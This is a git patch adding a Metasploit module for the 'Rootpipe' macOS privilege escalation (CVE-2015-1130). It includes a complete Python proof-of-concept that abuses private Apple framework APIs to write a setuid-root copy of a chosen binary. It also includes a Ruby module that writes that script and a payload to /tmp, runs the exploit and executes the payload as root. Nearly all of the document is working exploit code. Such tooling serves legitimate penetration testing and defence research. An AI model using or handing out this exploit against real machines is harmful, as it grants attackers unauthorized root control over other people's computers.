From c4b7b3274573d11db4a1776ef2500a79046a127f Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 9 Apr 2015 16:05:52 -0500 Subject: [PATCH] Add Rootpipe exploit --- data/exploits/CVE-2015-1130/exploit.py | 73 ++++++++++++++++++++++ modules/exploits/osx/local/rootpipe.rb | 85 ++++++++++++++++++++++++++ 2 files changed, 158 insertions(+) create mode 100644 data/exploits/CVE-2015-1130/exploit.py create mode 100644 modules/exploits/osx/local/rootpipe.rb diff --git a/data/exploits/CVE-2015-1130/exploit.py b/data/exploits/CVE-2015-1130/exploit.py new file mode 100644 index 0000000000..0d83f3e22a --- /dev/null +++ b/data/exploits/CVE-2015-1130/exploit.py @@ -0,0 +1,73 @@ +######################################################## +# +# PoC exploit code for rootpipe (CVE-2015-1130) +# +# Created by Emil Kvarnhammar, TrueSec +# +# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 +# +######################################################## +import os +import sys +import platform +import re +import ctypes +import objc +import sys +from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions +from Foundation import NSAutoreleasePool + +def load_lib(append_path): + return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path); + +def use_old_api(): + return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0]) + + +args = sys.argv + +if len(args) != 3: + print "usage: exploit.py source_binary dest_binary_as_root" + sys.exit(-1) + +source_binary = args[1] +dest_binary = os.path.realpath(args[2]) + +if not os.path.exists(source_binary): + raise Exception("file does not exist!") + +pool = NSAutoreleasePool.alloc().init() + +attr = NSMutableDictionary.alloc().init() +attr.setValue_forKey_(04777, NSFilePosixPermissions) +data = NSData.alloc().initWithContentsOfFile_(source_binary) + +print "will write file", dest_binary + +if use_old_api(): + adm_lib = load_lib("/Admin.framework/Admin") + Authenticator = objc.lookUpClass("Authenticator") + ToolLiaison = objc.lookUpClass("ToolLiaison") + SFAuthorization = objc.lookUpClass("SFAuthorization") + + authent = Authenticator.sharedAuthenticator() + authref = SFAuthorization.authorization() + + # authref with value nil is not accepted on OS X <= 10.8 + authent.authenticateUsingAuthorizationSync_(authref) + st = ToolLiaison.sharedToolLiaison() + tool = st.tool() + tool.createFileWithContents_path_attributes_(data, dest_binary, attr) +else: + adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration") + WriteConfigClient = objc.lookUpClass("WriteConfigClient") + client = WriteConfigClient.sharedClient() + client.authenticateUsingAuthorizationSync_(None) + tool = client.remoteProxy() + + tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) + + +print "Done!" + +del pool diff --git a/modules/exploits/osx/local/rootpipe.rb b/modules/exploits/osx/local/rootpipe.rb new file mode 100644 index 0000000000..e31e436379 --- /dev/null +++ b/modules/exploits/osx/local/rootpipe.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Local + + Rank = GreatRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mac OS X "Rootpipe" Privilege Escalation', + 'Description' => %q{ + This module exploits a hidden backdoor API in Apple's Admin framework on + OS X to escalate privileges to root. Dubbed "Rootpipe." + + Tested on Yosemite 10.10.2 and should work on previous versions. + + The patch for this issue was not backported to older releases. + }, + 'Author' => [ + 'Emil Kvarnhammar', # Vulnerability discovery and PoC + 'joev', # Copy/paste monkey + 'wvu' # Meta copy/paste monkey + ], + 'References' => [ + ['CVE', '2015-1130'], + ['EDB', '36692'], + ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/'] + ], + 'DisclosureDate' => 'Apr 9 2015', + 'License' => MSF_LICENSE, + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64, + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [ + ['Mac OS X 10.10.2 Yosemite x64 (Native Payload)', {}] + ], + 'DefaultTarget' => 0 + )) + end + + def check + if ver_lt(osx_ver, '10.10.3') + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + + def exploit + exploit_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1130') + python_exploit = File.read(File.join(exploit_path, 'exploit.py')) + binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) + exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + + print_status("Writing exploit file as '#{exploit_file}'") + write_file(exploit_file, python_exploit) + register_file_for_cleanup(exploit_file) + + print_status("Writing payload file as '#{payload_file}'") + write_file(payload_file, binary_payload) + register_file_for_cleanup(payload_file) + + print_status('Executing payload...') + cmd_exec("python #{exploit_file} #{payload_file} #{payload_file}") + cmd_exec(payload_file) + end + + def osx_ver + cmd_exec('sw_vers -productVersion').to_s.strip + end + + def ver_lt(a, b) + Gem::Version.new(a) < Gem::Version.new(b) + end + +end